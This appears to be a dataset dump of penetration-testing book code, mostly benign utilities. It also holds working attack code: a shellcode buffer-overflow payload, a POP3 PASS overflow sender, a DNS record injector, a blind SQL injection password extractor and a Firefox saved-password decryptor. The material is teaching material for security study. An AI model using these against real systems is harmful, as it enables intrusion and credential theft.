repo_name
stringclasses 29
values | text
stringlengths 18
367k
| avg_line_length
float64 5.6
132
| max_line_length
int64 11
3.7k
| alphnanum_fraction
float64 0.28
0.94
|
---|---|---|---|---|
Python-Penetration-Testing-for-Developers | import screenshot
import requests
# Web-facing ports commonly exposed by hosting panels (cPanel/WHM-style) and proxies.
portList = [80,443,2082,2083,2086,2087,2095,2096,8080,8880,8443,9998,4643,9001,4489]
# Target host plus the two URL scheme prefixes probed for every port below.
IP = '127.0.0.1'
http = 'http://'
https = 'https://'
def testAndSave(protocol, portNumber):
    """Probe protocol://IP:portNumber and, on an HTTP 200 answer, save a
    rendered screenshot of the page as '<portNumber>.png'.

    :param protocol: URL scheme prefix, e.g. 'http://' or 'https://'
    :param portNumber: TCP port to probe
    """
    url = protocol + IP + ':' + str(portNumber)
    try:
        r = requests.get(url, timeout=1)
        if r.status_code == 200:
            # Single-argument print() behaves identically on Python 2 and 3.
            print('Found site on ' + url)
            s = screenshot.Screenshot()
            image = s.get_image(url)
            image.save(str(portNumber) + '.png')
    # Narrowed from a bare 'except:' which also swallowed KeyboardInterrupt
    # and SystemExit; the scan is still best-effort for ordinary failures.
    except Exception:
        pass
# Probe every candidate port over both plain HTTP and HTTPS.
for port in portList:
    testAndSave(http, port)
    testAndSave(https, port)
| 22.259259 | 84 | 0.588517 |
Python-Penetration-Testing-for-Developers | import sys
import time
from PyQt4.QtCore import *
from PyQt4.QtGui import *
from PyQt4.QtWebKit import *
class Screenshot(QWebView):
    """Render a URL in an off-screen PyQt4 QWebView and capture the fully
    loaded page into a QImage."""

    def __init__(self):
        # A QApplication must exist before any Qt widget can be constructed.
        self.app = QApplication(sys.argv)
        QWebView.__init__(self)
        self._loaded = False
        # _loadFinished flips the flag once the page load completes.
        self.loadFinished.connect(self._loadFinished)

    def wait_load(self, delay=0):
        # Pump the Qt event loop until the loadFinished signal has fired.
        while not self._loaded:
            self.app.processEvents()
            time.sleep(delay)
        # Reset so the same instance can load another URL afterwards.
        self._loaded = False

    def _loadFinished(self, result):
        # Qt slot; 'result' is the success flag from loadFinished (unused).
        self._loaded = True

    def get_image(self, url):
        """Load 'url', wait for it to finish, and return the rendered page
        as a QImage sized to the full page content."""
        self.load(QUrl(url))
        self.wait_load()
        # Grow the viewport to the content size so nothing is clipped.
        frame = self.page().mainFrame()
        self.page().setViewportSize(frame.contentsSize())
        image = QImage(self.page().viewportSize(), QImage.Format_ARGB32)
        painter = QPainter(image)
        frame.render(painter)
        painter.end()
        return image
# Demo: capture packtpub.com and write the render to website.png.
s = Screenshot()
image = s.get_image('http://www.packtpub.com')
image.save('website.png')
| 25 | 72 | 0.609082 |
Mastering-Machine-Learning-for-Penetration-Testing | import pandas
import numpy
from sklearn.feature_selection import SelectKBest
from sklearn.feature_selection import chi2
# load data
# Pima Indians diabetes dataset: 8 numeric features plus a binary class label.
url = "https://raw.githubusercontent.com/jbrownlee/Datasets/master/pima-indians-diabetes.data.csv"
names = ['preg', 'plas', 'pres', 'skin', 'test', 'mass', 'pedi', 'age', 'class']
dataframe = pandas.read_csv(url, names=names)
array = dataframe.values
X = array[:,0:8]  # feature matrix: all rows, first 8 columns
Y = array[:,8]    # class labels: last column
# feature extraction
# Chi-squared scores each feature against the label; keep the 4 best.
test = SelectKBest(score_func=chi2, k=4)
fit = test.fit(X, Y)
# summarize scores
numpy.set_printoptions(precision=3)
print(fit.scores_)
features = fit.transform(X)
# summarize selected features
print(features[0:5,:])
| 30.142857 | 98 | 0.738132 |
Python-Penetration-Testing-for-Developers | #!/usr/bin/python
# -*- coding: utf-8 -*-
import hashlib
# Prompt for a string and print its digest under each common hash algorithm.
# raw_input is Python 2, matching the rest of this script's style.
message = raw_input("Enter the string you would like to hash: ")
# One hashlib.new() loop replaces four copy-pasted digest blocks; output
# lines are identical to the original ("MD5 Hash = <hex>", ...).
for algorithm in ('md5', 'sha1', 'sha256', 'sha512'):
    digest = hashlib.new(algorithm, message).hexdigest()
    print(algorithm.upper() + " Hash = " + digest)
print("End of list.")
Hands-On-Penetration-Testing-with-Python | """Logger module for XTreme Project"""
import time
class Logger(object):
    """Logger class for logging every important event in the discovery process"""

    def __init__(self, write_to_file=False):
        # When True, callers intend findings to also be written to a report file.
        self.file_write = write_to_file

    def log(self, string, Type=None, REPORT_FILE=None):
        """Print a timestamped log line; append vulnerability findings to REPORT_FILE.

        Type now defaults to None (treated as 'INFO'): the module's own demo
        calls log() with a single argument, which previously raised TypeError.
        """
        if not Type:
            Type = 'INFO'
        # Single-argument print() is valid on both Python 2 and 3.
        print("[%s] - %s: %s" % (time.ctime(), Type, string.encode('utf-8')))
        # Append to the report only for vulnerability findings.
        if REPORT_FILE and Type.find("VULNERABILITY FOUND") != -1:
            with open(REPORT_FILE, 'a') as f:
                f.writelines("%s \n %s \n %s \n \n" % (time.ctime(), Type, string))
if __name__ == "__main__":
    # Smoke test of the logger.
    logger = Logger()
    logger.log('checking!', 'warning')
    # NOTE(review): log() declares 'Type' with no default, so this
    # one-argument call raises TypeError as written — confirm intent.
    logger.log('abcd')
| 29.857143 | 88 | 0.534183 |
owtf | """
owtf.managers.plugin
~~~~~~~~~~~~~~~~~~~~
This module manages the plugins and their dependencies
"""
import imp
import json
import os
from owtf.models.plugin import Plugin
from owtf.models.test_group import TestGroup
from owtf.settings import PLUGINS_DIR
from owtf.utils.error import abort_framework
from owtf.utils.file import FileOperations
TEST_GROUPS = ["web", "network", "auxiliary"]
def get_test_groups_config(file_path):
    """Reads the test groups from a config file
    .. note::
        This needs to be a list instead of a dictionary to preserve order in python < 2.7
    :param file_path: The path to the config file
    :type file_path: `str`
    :return: List of test groups
    :rtype: `list`
    """
    test_groups = []
    config_file = FileOperations.open(file_path, "r").read().splitlines()
    for line in config_file:
        # Skip blank lines (line[0] used to raise IndexError) and comments.
        if not line or line.startswith("#"):
            continue
        try:
            code, priority, descrip, hint, url = line.strip().split(" | ")
        except ValueError:
            abort_framework(
                "Problem in Test Groups file: '{!s}' -> Cannot parse line: {!s}".format(
                    file_path, line
                )
            )
            # abort_framework presumably raises/exits; guard against it
            # returning, in which case the names above would be unbound.
            continue
        if len(descrip) < 2:
            descrip = hint
        if len(hint) < 2:
            hint = ""
        test_groups.append(
            {
                "code": code,
                "priority": priority,
                "descrip": descrip,
                "hint": hint,
                "url": url,
            }
        )
    return test_groups
def load_test_groups(session, file_default, file_fallback, plugin_group):
    """Load test groups into the DB.

    Reads the default test-groups config when present, otherwise the
    fallback file, and merges one TestGroup row per parsed entry.

    :param plugin_group: Plugin group to load
    :type plugin_group: `str`
    :return: None
    :rtype: None
    """
    # Prefer the default file; fall back only when it does not exist.
    chosen_path = file_default if os.path.isfile(file_default) else file_fallback
    for entry in get_test_groups_config(chosen_path):
        session.merge(
            TestGroup(
                code=entry["code"],
                priority=entry["priority"],
                descrip=entry["descrip"],
                hint=entry["hint"],
                url=entry["url"],
                group=plugin_group,
            )
        )
    session.commit()
def load_plugins(session):
    """Loads the plugins from the filesystem and updates their info.
    .. note::
        Walks through each sub-directory of `PLUGINS_DIR`.
        For each file, loads it thanks to the imp module.
        Updates the database with the information for each plugin:
            + 'title': the title of the plugin
            + 'name': the name of the plugin
            + 'code': the internal code of the plugin
            + 'group': the group of the plugin (ex: web)
            + 'type': the type of the plugin (ex: active, passive, ...)
            + 'descrip': the description of the plugin
            + 'file': the filename of the plugin
            + 'internet_res': does the plugin use internet resources?
    :return: None
    :rtype: None
    """
    # TODO: When the -t, -e or -o is given to OWTF command line, only load
    # the specific plugins (and not all of them like below).
    # Retrieve the list of the plugins (sorted) from the directory given by
    # 'PLUGIN_DIR'.
    plugins = []
    for root, _, files in os.walk(PLUGINS_DIR):
        plugins.extend(
            [
                os.path.join(root, filename)
                for filename in files
                # NOTE(review): endswith("py") also matches e.g. "*.pyc"-less
                # names ending in 'py'; endswith(".py") may be intended.
                if filename.endswith("py")
            ]
        )
    plugins = sorted(plugins)
    # Retrieve the information of the plugin.
    for plugin_path in plugins:
        # Only keep the relative path to the plugin
        plugin = plugin_path.replace(PLUGINS_DIR, "")
        # TODO: Using os.path.sep might not be portable especially on
        # Windows platform since it allows '/' and '\' in the path.
        # Retrieve the group, the type and the file of the plugin.
        # Ensure all empty strings are removed from the list
        chunks = list(filter(None, plugin.split(os.path.sep)))
        # TODO: Ensure that the variables group, type and file exist when
        # the length of chunks is less than 3.
        # NOTE(review): when len(chunks) != 3, the code below reuses
        # group/type/file from the previous iteration (or raises NameError
        # on the first) — confirm this path cannot occur.
        if len(chunks) == 3:
            group, type, file = chunks
        # Retrieve the internal name and code of the plugin.
        name, code = os.path.splitext(file)[0].split("@")
        # Only load the plugin if in XXX_TEST_GROUPS configuration (e.g. web_testgroups.cfg)
        if session.query(TestGroup).get(code) is None:
            continue
        # Load the plugin as a module.
        filename, pathname, desc = imp.find_module(
            os.path.splitext(os.path.basename(plugin_path))[0],
            [os.path.dirname(plugin_path)],
        )
        plugin_module = imp.load_module(
            os.path.splitext(file)[0], filename, pathname, desc
        )
        # Try to retrieve the `attr` dictionary from the module and convert
        # it to json in order to save it into the database.
        attr = None
        try:
            attr = json.dumps(plugin_module.ATTR)
        except AttributeError:  # The plugin didn't define an attr dict.
            pass
        # Save the plugin into the database.
        session.merge(
            Plugin(
                key="{!s}@{!s}".format(type, code),
                group=group,
                type=type,
                title=name.title().replace("_", " "),
                name=name,
                code=code,
                file=file,
                descrip=plugin_module.DESCRIPTION,
                attr=attr,
            )
        )
    session.commit()
def get_types_for_plugin_group(session, plugin_group):
    """Get available plugin types for a plugin group

    :param plugin_group: Plugin group
    :type plugin_group: `str`
    :return: List of available plugin types
    :rtype: `list`
    """
    rows = (
        session.query(Plugin.type)
        .filter_by(group=plugin_group)
        .distinct()
        .all()
    )
    # Each row is a one-element tuple; unwrap to plain type strings.
    return [row[0] for row in rows]
def plugin_gen_query(session, criteria):
    """Generate a SQLAlchemy query based on the filter criteria

    Each supported key may hold a single string (equality filter) or a
    list of strings (IN filter); falsy/absent values are ignored.

    :param criteria: Filter criteria
    :type criteria: `dict`
    :return:
    :rtype:
    """
    query = session.query(Plugin).join(TestGroup)
    # Table-driven version of the original per-field if-blocks.
    for field in ("type", "group", "code", "name"):
        value = criteria.get(field, None)
        if not value:
            continue
        column = getattr(Plugin, field)
        if isinstance(value, str):
            query = query.filter(column == value)
        elif isinstance(value, list):
            query = query.filter(column.in_(value))
    return query.order_by(TestGroup.priority.desc())
def get_all_plugin_dicts(session, criteria=None):
    """Get plugin dicts based on filter criteria

    :param criteria: Filter criteria
    :type criteria: `dict`
    :return: List of plugin dicts
    :rtype: `list`
    """
    if criteria is None:
        criteria = {}
    if "code" in criteria:
        # Callers may pass plugin names here; normalise them to codes.
        criteria["code"] = Plugin.name_to_code(session, criteria["code"])
    return [
        plugin.to_dict()
        for plugin in plugin_gen_query(session, criteria).all()
    ]
def get_plugins_by_type(session, plugin_type):
    """Get plugins based on type argument

    :param plugin_type: Plugin type
    :type plugin_type: `str`
    :return: List of plugin dicts
    :rtype: `list`
    """
    criteria = {"type": plugin_type}
    return get_all_plugin_dicts(session, criteria)
def get_plugins_by_group(session, plugin_group):
    """Get plugins by plugin group

    :param plugin_group: Plugin group
    :type plugin_group: `str`
    :return: List of plugin dicts
    :rtype: `list`
    """
    criteria = {"group": plugin_group}
    return get_all_plugin_dicts(session, criteria)
def get_plugins_by_group_type(session, plugin_group, plugin_type):
    """Get plugins by group and plugin type

    :param plugin_group: Plugin group
    :type plugin_group: `str`
    :param plugin_type: plugin type
    :type plugin_type: `str`
    :return: List of plugin dicts
    :rtype: `list`
    """
    criteria = {"group": plugin_group, "type": plugin_type}
    return get_all_plugin_dicts(session, criteria)
| 32.777778 | 92 | 0.58899 |
Python-Penetration-Testing-for-Developers | import sys
import os
import nmap
# Parse a previously saved nmap XML report and print it in CSV form.
with open("./nmap_output.xml", "r") as fd:
    content = fd.read()
# Bug fix: 'nm' was referenced without ever being created (NameError).
nm = nmap.PortScanner()
nm.analyse_nmap_xml_scan(content)
print(nm.csv())
Hands-On-Penetration-Testing-with-Python | #!/usr/bin/python
# Build a classic stack-overflow payload: NOP slide + shellcode + padding
# + little-endian 64-bit return address, printed to stdout.
payload_length = 424
## Amount of nops
nop_length = 100
#0x7fffffffddf0
#0x7fffffffded0:
#return_address = '\xf0\xdd\xff\xff\xff\x7f\x00\x00'
# Address the saved return pointer is overwritten with (points into the slide).
return_address = '\xd0\xde\xff\xff\xff\x7f\x00\x00'
## Building the nop slide
nop_slide = "\x90" * nop_length
## Malicious code injection
# Encoded shellcode blob — these bytes must stay exactly as generated.
buf = ""
buf += "\x48\x31\xc9\x48\x81\xe9\xf6\xff\xff\xff\x48\x8d\x05"
buf += "\xef\xff\xff\xff\x48\xbb\xc5\xe7\x76\x87\xc5\x35\x99"
buf += "\x1a\x48\x31\x58\x27\x48\x2d\xf8\xff\xff\xff\xe2\xf4"
buf += "\xaf\xce\x2e\x1e\xaf\x37\xc6\x70\xc4\xb9\x79\x82\x8d"
buf += "\xa2\xd1\xa3\xc7\xe7\x67\xdb\x05\x9d\x63\x89\x94\xaf"
buf += "\xff\x61\xaf\x25\xc3\x70\xef\xbf\x79\x82\xaf\x36\xc7"
buf += "\x52\x3a\x29\x1c\xa6\x9d\x3a\x9c\x6f\x33\x8d\x4d\xdf"
buf += "\x5c\x7d\x22\x35\xa7\x8e\x18\xa8\xb6\x5d\x99\x49\x8d"
buf += "\x6e\x91\xd5\x92\x7d\x10\xfc\xca\xe2\x76\x87\xc5\x35"
buf += "\x99\x1a"
## Building the padding between buffer overflow start and return address
padding = 'B' * (payload_length - nop_length - len(buf))
#perfect
print nop_slide + buf + padding + return_address
| 36.206897 | 72 | 0.690167 |
Hands-On-Penetration-Testing-with-Python | #!/usr/bin/python
import socket
# POP3 'PASS' overflow probe: 2606 filler bytes, 4 bytes ('BBBB') that land
# in the saved return pointer, then 90 trailing bytes.
buffer=["A"]   # NOTE(review): unused — leftover from an earlier fuzzing loop
counter=100    # NOTE(review): unused
string="A"*2606 + "B"*4 +"C"*90
if 1:
    print"Fuzzing PASS with %s bytes" % len(string)
    s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
    connect=s.connect(('192.168.250.136',110))
    data=s.recv(1024)   # server banner
    #print str(data)
    s.send('USER root\r\n')
    data=s.recv(1024)
    print str(data)
    # Deliver the overflow string as the password.
    s.send('PASS ' + string + '\r\n')
    data=s.recv(1024)
    print str(data)
    print "done"
    #s.send('QUIT\r\n')
    #s.close()
| 18.259259 | 54 | 0.576108 |
PenTestScripts | #!/usr/bin/env python
# by Chris Truncer
# Script to attempt to forge a packet that will inject a new value
# for a dns record. Check nessus plugin #35372
# Some great documentation and sample code came from:
# http://bb.secdev.org/scapy/src/46e0b3e619547631d704c133a0247cf4683c0784/scapy/layers/dns.py
import argparse
import logging
# I know it's bad practice to add code up here, but it's the only way I could
# see to suppress the IPv6 warning from scapy (By setting this
# before importing scapy).
logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
import os
from scapy.all import IP, UDP, DNS, DNSQR, DNSRR, sr1
import sys
def add_a_record(name_server, new_dns_record, ip_value):
    """Send a DNS dynamic-update packet (opcode 5) to name_server adding an
    'A' record that points new_dns_record at ip_value."""
    os.system('clear')
    title()
    # Verifying all required options have a populated value
    if name_server is None or new_dns_record is None or ip_value is None:
        print "[*] ERROR: You did not provide all the required command line options!"
        print "[*] ERROR: Please re-run with required options."
        sys.exit()
    print "[*] Crafting packet for record injection..."
    print "[*] Sending DNS packet adding " + new_dns_record
    print "[*] and pointing it to " + ip_value + "\n"
    # The zone is everything after the first label (host.zone -> zone).
    dns_zone = new_dns_record[new_dns_record.find(".")+1:]
    # Craft the packet with scapy
    add_packet = sr1(IP(dst=name_server)/UDP()/DNS(
        opcode=5,
        qd=[DNSQR(qname=dns_zone, qtype="SOA")],
        ns=[DNSRR(rrname=new_dns_record,
                  type="A", ttl=120, rdata=ip_value)]))
    print add_packet[DNS].summary()
    print "\n[*] Packet created and sent!"
def cli_parser():
    """Parse command-line flags; returns (add, delete, ns, d, ip)."""
    # Command line argument parser
    parser = argparse.ArgumentParser(
        add_help=False,
        description="DNSInject is a tool for modifying DNS records on vulnerable servers.")
    parser.add_argument(
        "--add", action='store_true',
        help="Add \"A\" record to the vulnerable name server.")
    parser.add_argument(
        "--delete", action='store_true',
        help="Delete \"A\" record from the vulnerable name server.")
    parser.add_argument(
        "-ns", metavar="ns1.test.com",
        help="Nameserver to execute the specified action.")
    parser.add_argument(
        "-d", metavar="mynewarecord.test.com",
        help="Domain name to create an A record for.")
    parser.add_argument(
        "-ip", metavar="192.168.1.1",
        help="IP Address the new record will point to.")
    # Custom help flags, since add_help=False disabled argparse's built-in -h.
    parser.add_argument(
        '-h', '-?', '--h', '-help', '--help', action="store_true",
        help=argparse.SUPPRESS)
    args = parser.parse_args()
    if args.h:
        parser.print_help()
        sys.exit()
    return args.add, args.delete, args.ns, args.d, args.ip
def delete_dns_record(del_ns, del_record):
    """Send a DNS dynamic-update packet to del_ns deleting the 'A' record
    del_record."""
    os.system('clear')
    title()
    # Verifying all required options have a populated value
    if del_ns is None or del_record is None:
        print "[*] ERROR: You did not provide all the required command line options!"
        print "[*] ERROR: Please re-run with required options."
        sys.exit()
    print "[*] Crafting packet for record deletion..."
    print "[*] Sending packet which deletes the following record: "
    print "[*] " + del_record + "\n"
    dns_zone = del_record[del_record.find(".")+1:]
    # type="ALL"/rclass="ANY"/ttl=0 appears to follow the dynamic-update
    # delete-RRset encoding — confirm against RFC 2136 if behavior is off.
    del_packet = sr1(IP(dst=del_ns)/UDP()/DNS(
        opcode=5,
        qd=[DNSQR(qname=dns_zone, qtype="SOA")],
        ns=[DNSRR(rrname=del_record, type="ALL",
                  rclass="ANY", ttl=0, rdata="")]))
    print del_packet[DNS].summary()
    print "\n[*] Packet created and sent!"
def title():
    # Print the ASCII banner shown before any other output.
    print "######################################################################"
    print "#                            DNS Injector                            #"
    print "######################################################################\n"
    return
if __name__ == '__main__':
    # Parse command line arguments
    action_add, action_delete, dns_nameserver, dns_record, dns_ip = cli_parser()
    # Choose function based on action variable value
    try:
        if action_add:
            add_a_record(dns_nameserver, dns_record, dns_ip)
        elif action_delete:
            delete_dns_record(dns_nameserver, dns_record)
        else:
            print "[*] ERROR: You didn't provide a valid action."
            print "[*] ERROR: Restart and provide your desired action!"
            sys.exit()
    # AttributeError is treated as "bad/missing action" — presumably raised
    # somewhere inside the handlers; confirm which call actually triggers it.
    except AttributeError:
        os.system('clear')
        title()
        print "[*] ERROR: You didn't provide a valid action."
        print "[*] ERROR: Restart and provide your desired action!"
| 31.737589 | 93 | 0.599783 |
cybersecurity-penetration-testing | import requests
import sys
# Blind SQL injection password recovery.
#   argv[1]: URL of the injectable form
#   argv[2]: marker string present in the page when the injected condition is true
url = sys.argv[1]
yes = sys.argv[2]
answer = []
print("Kicking off the attempt")
# Step 1: recover the password length via char_length() probes.
i = 1
while True:
    payload = {'injection': '\'AND char_length(password) = '+str(i)+';#', 'Submit': 'submit'}
    req = requests.post(url, data=payload)
    if yes in req.text:
        length = i
        break
    i = i + 1
# Step 2: brute-force each character position.
# Fixes vs. original: 'cookies' was undefined (NameError); each position now
# loops over candidate ASCII codes instead of advancing to the next position
# after a miss; chr() values are appended so ''.join(answer) works; the range
# includes the final character (was range(1, length)).
for x in range(1, length + 1):
    for asciivalue in range(32, 127):
        payload = {'injection': '\'AND (substr(password, '+str(x)+', 1)) = '+chr(asciivalue)+';#', 'Submit': 'submit'}
        req = requests.post(url, data=payload)
        if yes in req.text:
            answer.append(chr(asciivalue))
            break
print("Recovered String: " + ''.join(answer))
cybersecurity-penetration-testing | import time, dpkt
import plotly.plotly as py
from plotly.graph_objs import *
from datetime import datetime
# Plot the number of FTP (port 21) packets per second found in a pcap file.
filename = 'hbot.pcap'
full_datetime_list = []
# Collect a (timestamp, human-readable time) pair for every FTP TCP packet.
# The capture file is now closed deterministically via 'with'.
with open(filename, 'rb') as pcap_file:
    for ts, pkt in dpkt.pcap.Reader(pcap_file):
        eth = dpkt.ethernet.Ethernet(pkt)
        if eth.type != dpkt.ethernet.ETH_TYPE_IP:
            continue
        ip = eth.data
        tcp = ip.data
        if ip.p not in (dpkt.ip.IP_PROTO_TCP, dpkt.ip.IP_PROTO_UDP):
            continue
        if tcp.dport == 21 or tcp.sport == 21:
            full_datetime_list.append((ts, str(time.ctime(ts))))
# Count packets per second in a single pass (the original re-scanned the
# whole list for every distinct date: O(n*m)).
counts = {}
for _, stamp in full_datetime_list:
    counts[stamp] = counts.get(stamp, 0) + 1
dates = sorted(counts, key=lambda date: datetime.strptime(date, "%a %b %d %H:%M:%S %Y"))
datecount = [counts[d] for d in dates]
data = Data([
    Scatter(
        x=dates,
        y=datecount
    )
])
plot_url = py.plot(data, filename='FTP Requests')
| 18.96 | 76 | 0.608826 |
cybersecurity-penetration-testing |
import datetime
__author__ = 'Preston Miller & Chapin Bryce'
__date__ = '20150815'
__version__ = '0.01'
__description__ = "Convert unix formatted timestamps (seconds since Epoch [1970-01-01 00:00:00]) to human readable"
def main():
    # raw_input is Python 2 only; the prompt expects an integer number of
    # seconds since the Unix epoch.
    unix_ts = int(raw_input('Unix timestamp to convert:\n>> '))
    print unix_converter(unix_ts)
def unix_converter(timestamp):
    """Convert seconds since the Unix epoch to 'MM/DD/YYYY HH:MM:SS AM/PM UTC'."""
    # Epoch + offset is equivalent to utcfromtimestamp for these inputs.
    moment = datetime.datetime(1970, 1, 1) + datetime.timedelta(seconds=timestamp)
    return moment.strftime('%m/%d/%Y %I:%M:%S %p UTC')
# Run the interactive converter only when executed directly.
if __name__ == '__main__':
    main()
| 26.421053 | 115 | 0.653846 |
cybersecurity-penetration-testing | # Simple Substitution Keyword Cipher
# http://inventwithpython.com/hacking (BSD Licensed)
import pyperclip, simpleSubCipher
def main():
    """Demo driver: encrypt (or decrypt) a hard-coded message with a
    keyword-derived substitution key and copy the result to the clipboard."""
    myMessage = r"""Your cover is blown."""
    myKey = 'alphanumeric'
    myMode = 'encrypt' # set to 'encrypt' or 'decrypt'
    print('The key used is:')
    print(makeSimpleSubKey(myKey))
    if myMode == 'encrypt':
        translated = encryptMessage(myKey, myMessage)
    elif myMode == 'decrypt':
        translated = decryptMessage(myKey, myMessage)
    print('The %sed message is:' % (myMode))
    print(translated)
    # pyperclip places the result on the system clipboard.
    pyperclip.copy(translated)
    print()
    print('This message has been copied to the clipboard.')
def encryptMessage(key, message):
    """Encrypt message with the substitution key derived from the keyword."""
    subKey = makeSimpleSubKey(key)
    return simpleSubCipher.encryptMessage(subKey, message)
def decryptMessage(key, message):
    """Decrypt message with the substitution key derived from the keyword."""
    subKey = makeSimpleSubKey(key)
    return simpleSubCipher.decryptMessage(subKey, message)
def makeSimpleSubKey(keyword):
    """Build the substitution key: the keyword's unique letters (uppercased,
    in first-occurrence order) followed by the rest of the alphabet."""
    prefix = ''
    remaining = list(simpleSubCipher.LETTERS)
    for ch in keyword.upper():
        if ch in prefix:
            continue
        prefix += ch
        remaining.remove(ch)
    return prefix + ''.join(remaining)
# Run the demo only when executed directly, not when imported.
if __name__ == '__main__':
    main()
Hands-On-Penetration-Testing-with-Python | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import sqlite3, sys, glob, shutil, json, time, hashlib
from base64 import b64decode
from os import path, walk,makedirs,remove
from ctypes import (Structure, c_uint, c_void_p, c_ubyte,c_char_p, CDLL, cast,byref,string_at)
from datetime import datetime
from subprocess import call
# Magic Module: https://github.com/ahupp/python-magic
###############################################################################################################
# Raw string: the original relied on '\W', '\s', '\m' being invalid escape
# sequences (preserved verbatim), which raises DeprecationWarning on
# modern Python. The value is byte-identical.
magicpath = r'C:\WINDOWS\system32\magic' # Only in Windows, path to magic file (Read Manual in www.dumpzilla.org)
watchsecond = 4 # --Watch option: Seconds update. (NO Windows)
python3_path = "" # Python 3.x path (NO Windows). Example: /usr/bin/python3.2
##############################################################################################################
def show_info_header():
    # varSession2OK, varPasswordsOK and varDir are module globals set
    # elsewhere (presumably during option parsing) — confirm before reuse.
    if sys.version.startswith('2.') == True and varSession2OK == 1 and varPasswordsOK == 1:
        print ("\n[WARNING]: Python 2.x currently used, Python 3.x and UTF-8 is recommended !")
    elif varSession2OK == 1:
        print ("\nExecution time: %s" % datetime.now())
        print ("Mozilla Profile: %s\n" % varDir)
##############################################################################################################
def show_sha256(filepath):
    """Return '[SHA256 hash: <hexdigest>]' for the file at filepath.

    Uses a context manager and fixed-size chunks so the handle is always
    closed and large files are not read into memory at once.
    """
    digest = hashlib.sha256()
    with open(filepath, 'rb') as handle:
        for chunk in iter(lambda: handle.read(65536), b''):
            digest.update(chunk)
    return "[SHA256 hash: " + digest.hexdigest() + "]"
#############################################################################################################
class SECItem(Structure):
    # ctypes mirror of NSS's SECItem: a typed, length-prefixed data buffer.
    _fields_ = [('type',c_uint),('data',c_void_p),('len',c_uint)]

class secuPWData(Structure):
    # ctypes mirror of NSS's secuPWData: how a master password is supplied.
    _fields_ = [('source',c_ubyte),('data',c_char_p)]

# NSS status codes and password-source constants used with the structs above.
(SECWouldBlock,SECFailure,SECSuccess)=(-2,-1,0)
(PW_NONE,PW_FROMFILE,PW_PLAINTEXT,PW_EXTERNAL)=(0,1,2,3)
def readsignonDB(varDir):
    """Decrypt and print saved logins from the profile's signons.sqlite,
    using NSS (libnss) to decrypt the base64-encoded username/password blobs.

    Relies on module globals set elsewhere: libnss, uname, passwd, dectext,
    pwdata, contador, show_title — confirm they are initialised before calling.
    """
    show_title("Decode Passwords", 250)
    count = 0
    if libnss.NSS_Init(varDir)!=0:
        print ("Error Initializing NSS_Init, Probably no useful results")
    conn = sqlite3.connect(varDir+"/signons.sqlite")
    conn.text_factory = str
    c = conn.cursor()
    c.execute("select hostname, encryptedUsername, encryptedPassword from moz_logins")
    for row in c:
        # Feed the base64-decoded ciphertext to NSS via SECItem buffers.
        uname.data = cast(c_char_p(b64decode(row[1])),c_void_p)
        uname.len = len(b64decode(row[1]))
        passwd.data = cast(c_char_p(b64decode(row[2])),c_void_p)
        passwd.len=len(b64decode(row[2]))
        if libnss.PK11SDR_Decrypt(byref(uname),byref(dectext),byref(pwdata))==-1:
            print ("Error: Master Password used !")
            # NOTE(review): returning here leaves conn/cursor open and NSS
            # initialised — consider cleanup.
            return
        print ("Web: %s:"%row[0].encode("utf-8"))
        print ("Username: %s" % string_at(dectext.data,dectext.len))
        if libnss.PK11SDR_Decrypt(byref(passwd),byref(dectext),byref(pwdata))==-1:
            print ("Error: Master Password used !")
            return
        # NOTE(review): "Passsword" is a typo in the output label.
        print ("Passsword: %s" % string_at(dectext.data,dectext.len))
        print ("\n")
        count = count + 1
    contador['Passwords_decode'] = count
    c.close()
    conn.close()
    libnss.NSS_Shutdown()
##############################################################################################################
def show_session(varDir):
    """Print the current and backup Firefox session (sessionstore files)
    from profile directory varDir, dispatching on platform path separators."""
    # --- current session: sessionstore.js / sessionstore.json ---
    if sys.platform.startswith('win') == True:
        if path.isfile(varDir+"\\sessionstore.js") == False and path.isfile(varDir+"\\sessionstore.json") == False:
            return
        else:
            if path.isfile(varDir+"\\sessionstore.js") == True:
                f = open(varDir+"\\sessionstore.js")
                hashsession = show_sha256(varDir+"\\sessionstore.js")
            elif path.isfile(varDir+"\\sessionstore.json") == True:
                f = open(varDir+"\\sessionstore.json")
                hashsession = show_sha256(varDir+"\\sessionstore.json")
    else:
        if path.isfile(varDir+"/sessionstore.js") == False and path.isfile(varDir+"/sessionstore.json") == False:
            return
        else:
            if path.isfile(varDir+"/sessionstore.js") == True:
                f = open(varDir+"/sessionstore.js")
                hashsession = show_sha256(varDir+"/sessionstore.js")
            elif path.isfile(varDir+"/sessionstore.json") == True:
                f = open(varDir+"/sessionstore.json")
                hashsession = show_sha256(varDir+"/sessionstore.json")
    # 'js' labels the live session in extract_data_session.
    filesession = "js"
    jdata = json.loads(f.read())
    f.close()
    extract_data_session(jdata,filesession,hashsession)
    # --- backup session: sessionstore.bak ---
    # NOTE(review): both sides of these 'and' conditions test the same .bak
    # path twice — presumably one of them was meant to be another file.
    if sys.platform.startswith('win') == True:
        if path.isfile(varDir+"\\sessionstore.bak") == False and path.isfile(varDir+"\\sessionstore.bak") == False:
            return
        else:
            if path.isfile(varDir+"\\sessionstore.bak") == True:
                f = open(varDir+"\\sessionstore.bak")
                hashsession = show_sha256(varDir+"\\sessionstore.bak")
    else:
        if path.isfile(varDir+"/sessionstore.bak") == False and path.isfile(varDir+"/sessionstore.bak") == False:
            return
        else:
            if path.isfile(varDir+"/sessionstore.bak") == True:
                f = open(varDir+"/sessionstore.bak")
                hashsession = show_sha256(varDir+"/sessionstore.bak")
    filesession = "bak"
    jdata = json.loads(f.read())
    f.close()
    extract_data_session(jdata,filesession,hashsession)
###################################################################################################################
def extract_data_session(jdata,filesession,hashsession):
    """Print title/URL/referrer/form data for every tab recorded in a
    sessionstore JSON blob; the tab count is tallied into the module-level
    'contador' dict under 'Session1' (live) or 'Session2' (backup)."""
    if filesession == "js":
        show_title("Session "+hashsession, 302)
    elif filesession == "bak":
        show_title("Backup session "+hashsession, 302)
    count = 0
    # lastUpdate is stored in milliseconds since the epoch.
    print ("Last update %s:\n " % time.ctime(jdata["session"]["lastUpdate"]/1000.0))
    for win in jdata.get("windows"):
        for tab in win.get("tabs"):
            if tab.get("index") is not None:
                # 'index' is 1-based; the 'entries' list is 0-based.
                i = tab.get("index") - 1
                print ("Title: %s" % tab.get("entries")[i].get("title"))
                print ("URL: %s" % tab.get("entries")[i].get("url"))
                if tab.get("entries")[i].get("referrer") is not None:
